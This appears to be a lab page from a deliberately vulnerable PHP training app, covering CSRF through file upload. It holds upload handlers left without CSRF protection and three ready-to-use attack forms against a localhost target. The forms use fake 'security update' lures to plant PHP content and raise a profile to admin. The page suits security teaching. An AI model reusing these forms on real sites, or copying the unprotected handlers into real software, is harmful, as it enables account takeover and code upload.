Lab 3: CSRF via File Upload

Difficulty: Medium

Lab Overview

This lab demonstrates CSRF vulnerabilities that can be exploited through file upload functionality. Attackers can trick users into uploading malicious files or perform unauthorized actions through file upload forms.

Objective: Use file upload functionality to perform CSRF attacks and upload malicious content.

Vulnerable Code

// Vulnerable: No CSRF protection on file upload
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['upload_file'])) {
    $file_name = $_POST['file_name'] ?? '';
    $file_content = $_POST['file_content'] ?? '';
    
    // Process file upload without CSRF validation
    $_SESSION['uploaded_files'][] = [
        'name' => $file_name,
        'content' => $file_content,
        'uploaded_at' => date('Y-m-d H:i:s')
    ];
}

// Vulnerable: Malicious file upload
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['upload_malicious'])) {
    $malicious_content = $_POST['malicious_content'] ?? '';
    // Upload malicious content without validation
    $_SESSION['uploaded_files'][] = [
        'name' => 'malicious_file.php',
        'content' => $malicious_content,
        'type' => 'application/x-php'
    ];
}

File Upload Status

Uploaded Files (0)

No files uploaded yet.

File Upload

Malicious File Upload

Profile Update via File Upload

Vulnerability Details

Type: CSRF via File Upload
Severity: High
Method: POST
Issue: No CSRF protection on file upload functionality

CSRF Attack Examples

file_upload_csrf.html - Basic file upload attack
malicious_upload_csrf.html - Malicious file upload
profile_update_csrf.html - Profile update via file

CSRF Attack Payloads

Create these malicious HTML files to test CSRF attacks:

1. File Upload CSRF (file_upload_csrf.html):

<html>
<body>
    <h1>Upload your document here!</h1>
    <form action="http://localhost/test/csrf/3.php" method="POST">
        <input type="hidden" name="upload_file" value="1">
        <input type="hidden" name="file_name" value="malicious.txt">
        <input type="hidden" name="file_type" value="text/plain">
        <input type="hidden" name="file_content" value="This is a malicious file uploaded via CSRF!">
        <input type="submit" value="Upload Document">
    </form>
</body>
</html>

2. Malicious File Upload CSRF (malicious_upload_csrf.html):

<html>
<body>
    <h1>Security update required!</h1>
    <form action="http://localhost/test/csrf/3.php" method="POST">
        <input type="hidden" name="upload_malicious" value="1">
        <input type="hidden" name="malicious_content" value="<?php echo 'Hacked!'; ?>">
        <input type="submit" value="Install Security Update">
    </form>
</body>
</html>

3. Profile Update via File CSRF (profile_update_csrf.html):

<html>
<body>
    <h1>Profile backup required!</h1>
    <form action="http://localhost/test/csrf/3.php" method="POST">
        <input type="hidden" name="update_via_file" value="1">
        <input type="hidden" name="profile_data" value="username=hacked_user
email=hacker@evil.com
role=admin
balance=999999">
        <input type="submit" value="Backup Profile">
    </form>
</body>
</html>

Real-World Attack Scenarios

Upload malicious files and execute arbitrary code
Upload files that modify application behavior
Upload files that contain sensitive information
Upload files that bypass security controls
Upload files that perform unauthorized actions
Compliance violations and security breaches

Mitigation Strategies

Implement CSRF tokens for all file upload operations
Validate file types and content before processing
Use secure file upload handling and storage
Implement proper file access controls and permissions
Use SameSite cookie attributes
Regular security testing and vulnerability assessments
Monitor for unusual file upload patterns and anomalies